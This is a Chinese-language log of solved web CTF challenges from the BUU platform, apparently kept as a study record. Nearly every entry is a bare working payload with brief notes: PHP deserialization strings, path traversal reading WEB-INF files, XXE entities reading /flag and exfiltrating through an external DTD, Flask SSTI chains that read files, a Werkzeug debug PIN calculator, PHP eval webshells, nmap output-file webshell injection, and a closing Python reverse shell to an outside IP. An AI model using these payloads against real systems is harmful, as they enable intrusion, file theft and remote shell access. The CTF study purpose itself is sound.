BUU_Web_刷题记录_part2

(反序列化)[网鼎杯 2020 青龙组]AreUSerialz

• O:11:"FileHandler":3:{s:2:"op";i:2;s:8:"filename";s:8:"flag.php";s:7:"content";s:6:"laolao";}

知识点:

• protected绕过：php7.1+版本对属性类型不敏感，所以本地序列化就直接用public就可以绕过
• Linux下Apache目录明细

(XXE)[网鼎杯 2020 青龙组]filejava

• 读取WEB-XML：?filename=./../../../../WEB-INF/web.xml
• 下载class:
  • ?filename=./../../../../WEB-INF/classes/cn/abc/servlet/UploadServlet.class
  • ?filename=./../../../../WEB-INF/classes/cn/abc/servlet/ListFileServlet.class
  • ?filename=./../../../../WEB-INF/classes/cn/abc/servlet/DownloadServlet.class
• 查看源码，然后走xee
  • 选择Buu basic中的“Linux Labs”，ifconfig查看一下本机ip，在“/var/www/html”目录里写一份的dtd，url填的是 本机ip+自己设定的等会要监听的端口号，nc开启监听
  • 新建一份excel文档，后缀名改成“zip”，解压缩后可以看到一个叫 “[Content_Types].xml” 的文件，打开这份文件，添加一条代码，用来引用外部dtd实体，编辑好了再压缩回去，把后缀改回“xlsx”，选择文件上传，就可以在内网的这台机子上发现flag
  • 注意:命名格式-->"excel-***.xlsx"

知识点：

• https://www.gem-love.com/websecurity/2322.html 
• https://www.anquanke.com/post/id/205215

(PHP弱类型绕过)[MRCTF2020]Ez_bypass

——哎,真是纯真时代的美好题型

• get:?gg[]=1&id[]=0
• post:passwd=1234567a

(XXE)[NCTF2019]Fake XML cookbook

<?xml version = "1.0" encoding = "utf-8"?>
<!DOCTYPE hack [<!ENTITY lao SYSTEM "file:///flag">]>
<user><username>&lao;</username><password>123</password></user>

知识点：

• 从XML相关一步一步到XXE漏洞
• DTD 教程
• XML 系列教程
• <!ENTITY lao SYSTEM "file:///flag">：声明一个外部实体。实体名：lao,实体内容："file:///flag"的值，来自本地计算机：SYSTEM
• &lao;：引用这个实体
• <!DOCTYPE hack ：定义此文为hack类型
• 外部实体支持的协议：

(反序列+脑洞)[网鼎杯 2020 朱雀组]phpweb

• func=readfile&p=index.php

<?php
class Test {
    public $p = "ls /tmp";
    public $func = "system";
}
$b=new Test();
$a=serialize($b);
echo $a;

• func=unserialize&p=O:4:"Test":2:{s:1:"p";s:7:"ls /tmp";s:4:"func";s:6:"system";}
• func=readfile&p=/tmp/flagoefiu4r93

(脑洞)[MRCTF2020]PYWebsite

• 头部添加：X-Forwarded-For:127.0.0.1

(反序列化)[NPUCTF2020]ReadlezPHP

• flag在phpinfo()里面

<?php
error_reporting(1);
class HelloPhp
{
    public $a;
    public $b;
    public function __construct(){
        $this->a = "Y-m-d h:i:s";
        $this->b = "date";
    }
    public function __destruct(){
        $a = $this->a;
        $b = $this->b;
        echo $b($a);
    }
}

$t = new HelloPhp();
$t->b = 'assert';
$t->a = 'phpinfo();';

echo urlencode(serialize($t));
?>

(Json)[FBCTF2019]RCEService

• ?cmd={ %0A "cmd":"/bin/cat  /home/rceservice/flag jail" %0A}
• preg_match()函数只能匹配第一行数据，可以使用换行符%0a绕过

(CMS)[GKCTF2020]老八小超市儿

• 直接百度ShopXO的漏洞
• admin.php用默认密码登进去（admin  shopxo）
• 应用商城下载默认主题，把自己的马加进去，然后上传连马
  • http://4f0630d6-cac1-4165-827a-407050333901.node3.buuoj.cn/public/static/index/default/lao.php
• 红色的auto.sh每60s执行一个python程序
  • /var/mail/makeflaghint.py
• 进去修改代码，读取/roo/flag到flag.hint里面

[GKCTF2020]cve版签到

• ?url=http://127.0.0.123%00.ctfhub.com

• cve-2020-7066简单解析

(PHP禁用函数绕过)[GKCTF2020]CheckIN

漏洞：php7-gc-bypass漏洞利用PHP garbage collector程序中的堆溢出触发进而执行命令影响范围是linux，php7.0-7.3

• ?Ginkgo=cGhwaW5mbygpOw==
• 蚁剑连接:?Ginkgo=ZXZhbCgkX1BPU1RbJ2xhbyddKTs= ,密码：lao
• 在/tmp目录上传exp（pwn('/readflag‘）
• ?Ginkgo=dmFyX2R1bXAoaW5jbHVkZSgnL3RtcC9sYWppLnBocCcpKTs=

(PHP取反|异或绕过)[极客大挑战 2019]RCE ME

• ?code=(~%8F%97%8F%96%91%99%90)();
• 传一句话蚁剑连接，使用插件“绕过disable_functions”
• 关于PHP正则的一些绕过方法
• bypass_disable_functions

(ssti,Flask)[GYCTF2020]FlaskApp

绕过

• https://www.cnblogs.com/h3zh1/p/12694933.html
• https://www.cnblogs.com/h3zh1/p/12694933.html

#1.读源码
{% for c in [].__class__.__base__.__subclasses__() %}
    {% if c.__name__=='catch_warnings' %}
        {{ c.__init__.__globals__['__builtins__'].open('app.py','r').read() }}
    {% endif %}
{% endfor %}
#2.遍历根目录
{{''.__class__.__bases__[0].__subclasses__()[75].__init__.__globals__['__builtins__']['__imp'+'ort__']('o'+'s').listdir('/')}}
#3.getflag
{% for c in [].__class__.__base__.__subclasses__() %}
    {% if c.__name__=='catch_warnings' %}
        {{ c.__init__.__globals__['__builtins__'].open('txt.galf_eht_si_siht/'[::-1],'r').read() }}
    {% endif %}
{% endfor %}

 pin

• https://www.cnblogs.com/MisakaYuii-Z/p/12407760.html

# {{().__class__.__bases__[0].__subclasses__()[75].__init__.__globals__.__builtins__['open']('/etc/passwd').read()}} # flaskweb
# {{().__class__.__bases__[0].__subclasses__()[75].__init__.__globals__.__builtins__['open']('/sys/class/net/eth0/address').read()}}   # 02:42:ae:01:f0:45=2485410459717
# {{().__class__.__bases__[0].__subclasses__()[75].__init__.__globals__.__builtins__['open']('/proc/self/cgroup').read()}} # docker机器id b1dea45d61a2c105caf3b988cad9553d5467ffd8d9c81521e7a71514d6a333e2
import hashlib
from itertools import chain
probably_public_bits = [
    'flaskweb',
    'flask.app',
    'Flask',
    '/usr/local/lib/python3.7/site-packages/flask/app.py',
]

private_bits = [
    '2485410459717',
    'b1dea45d61a2c105caf3b988cad9553d5467ffd8d9c81521e7a71514d6a333e2'
]

h = hashlib.md5()
for bit in chain(probably_public_bits, private_bits):
    if not bit:
        continue
    if isinstance(bit, str):
        bit = bit.encode('utf-8')
    h.update(bit)
h.update(b'cookiesalt')

cookie_name = '__wzd' + h.hexdigest()[:20]

num = None
if num is None:
    h.update(b'pinsalt')
    num = ('%09d' % int(h.hexdigest(), 16))[:9]

rv =None
if rv is None:
    for group_size in 5, 4, 3:
        if len(num) % group_size == 0:
            rv = '-'.join(num[x:x + group_size].rjust(group_size, '0')
                          for x in range(0, len(num), group_size))
            break
    else:
        rv = num

print(rv)

# PIN:436-259-020

(nmap命令行参数注入)[网鼎杯 2020 朱雀组]Nmap

• ' <?= @eval($_POST["pd"]);?> -oG pd.phtml '

(水题)[BSidesCF 2019]Futurella

• 右键看源码

(flask+反弹连接)[V&N2020 公开赛]CHECKIN

• https://www.zhaoj.in/read-6407.html
• 【Linux恢复误删除的文件或者目录】
• 【反弹shell payload总结 】
  

# 反弹shell，然后再/proc里找fd
?c=python3  -c  'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("174.1.245.102",9999));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'